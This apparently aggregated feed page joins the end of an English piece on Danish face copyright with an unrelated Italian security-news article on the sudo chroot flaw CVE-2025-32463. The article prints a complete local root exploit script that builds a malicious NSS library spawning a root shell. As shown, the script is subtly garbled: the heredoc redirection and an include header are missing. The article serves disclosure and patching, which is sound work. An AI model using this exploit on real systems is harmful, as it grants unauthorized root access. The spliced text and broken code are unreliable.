You might of course ask, whether it’s now risky to photograph a Dane. We are not of course lawyers here but like any journalists we have to possess a knowledge of how copyright works, and we are guessing that the idea in play here is that of passing off. If you take a photograph of a Volkswagen you will have captured the VW logo on its front, but the car company will not sue you because you are not passing off something that’s not a Volkswagen as the real thing. So it will be with Danes; if you take a picture of their now-copyrighted face in a crowd you are not passing it off as anything but a real picture of them, so we think you should be safe.

We welcome this move, and wish other countries would follow suit.

Pope Francis, Midjourney, Public domain, (Which is a copyright story all of its own!)

hackaday.com/2025/07/02/finall…

Nella giornata di ieri, Red Hot Cyber ha pubblicato un approfondimento su una grave vulnerabilità scoperta in SUDO (CVE-2025-32463), che consente l’escalation dei privilegi a root in ambienti Linux sfruttando un abuso della funzione chroot.

L’exploit, reso pubblico da Stratascale, dimostra come un utente non privilegiato possa ottenere l’accesso root tramite una precisa catena di operazioni che sfruttano un comportamento errato nella gestione dei processi figli in ambienti chroot.

Test sul campo: la parola a Manuel Roccon del gruppo HackerHood

Manuel Roccon, ricercatore del gruppo HackerHood di Red Hot Cyber, ha voluto mettere le mani sull’exploit per verificarne concretamente la portata e valutarne la replicabilità in ambienti reali. “Non potevo resistere alla tentazione di provarlo in un ambiente isolato. È impressionante quanto sia diretto e pulito il meccanismo, una volta soddisfatti i requisiti richiesti dal PoC”, afferma Manuel.

Il team ha quindi testato il Proof of Concept pubblicato da Stratascale Exploit CVE-2025-32463 – sudo chroot. Il risultato? Privilege escalation ottenuta con successo.

youtube.com/embed/-GxiqS-f7Yg?…

Dettagli dell’exploit

L’exploit sfrutta una condizione in cui sudo esegue un comando in un ambiente chroot, lasciando tuttavia aperte alcune possibilità al processo figlio di uscire dal chroot e di manipolare lo spazio dei nomi dei processi (namespace) fino ad ottenere accesso completo come utente root.

L’exploit CVE-2025-32463, dimostrato nel PoC sudo-chwoot.sh di Rich Mirch (Stratascale CRU), sfrutta una vulnerabilità in sudo che consente a un utente non privilegiato di ottenere privilegi di root quando sudo viene eseguito con l’opzione -R (che specifica un chroot directory). Lo script crea un ambiente temporaneo (/tmp/sudowoot.stage.*), compila una libreria condivisa malevola (libnss_/woot1337.so.2) contenente una funzione constructor che eleva i privilegi e apre una shell root (/bin/bash), e forza sudo a caricarla come libreria NSS nel contesto chroot.

La tecnica sfrutta un errore logico nella gestione della libreria NSS in ambienti chroot, dove sudo carica dinamicamente librerie esterne senza isolarle correttamente. Lo script imposta infatti una finta configurazione nsswitch.conf per forzare l’uso della propria libreria, posizionandola all’interno della directory woot/, che funge da root virtuale per il chroot. Quando sudo -R woot woot viene eseguito, la libreria woot1337.so.2 viene caricata, e il codice eseguito automaticamente grazie all’attributo __attribute__((constructor)), ottenendo così l’escalation dei privilegi.

I requisiti fondamentali per sfruttare con successo questa vulnerabilità includono:

• L’abilitazione dell’uso di chroot tramite sudo.
• L’assenza di alcune restrizioni nei profili di sicurezza (come AppArmor o SELinux).
• Una configurazione permissiva di sudoers.

Di seguito le semplici righe

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > woot1337.c
#include

__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

Conclusioni

Il test effettuato da Manuel Roccon dimostra quanto questa vulnerabilità non sia solo teorica, ma pienamente sfruttabile in ambienti di produzione non correttamente protetti. In scenari DevOps o containerizzati, dove l’uso di sudo e chroot è comune, i rischi aumentano considerevolmente.

Red Hot Cyber e il gruppo HackerHood raccomandano l’immediato aggiornamento di SUDO all’ultima versione disponibile, e la revisione delle configurazioni di sicurezza relative a chroot e permessi sudoers.

La sicurezza parte dalla consapevolezza. Continuate a seguirci per analisi tecniche, PoC testati e segnalazioni aggiornate.

L'articolo Linux Pwned! Privilege Escalation su SUDO in 5 secondi. HackerHood testa l’exploit CVE-2025-32463 proviene da il blog della sicurezza informatica.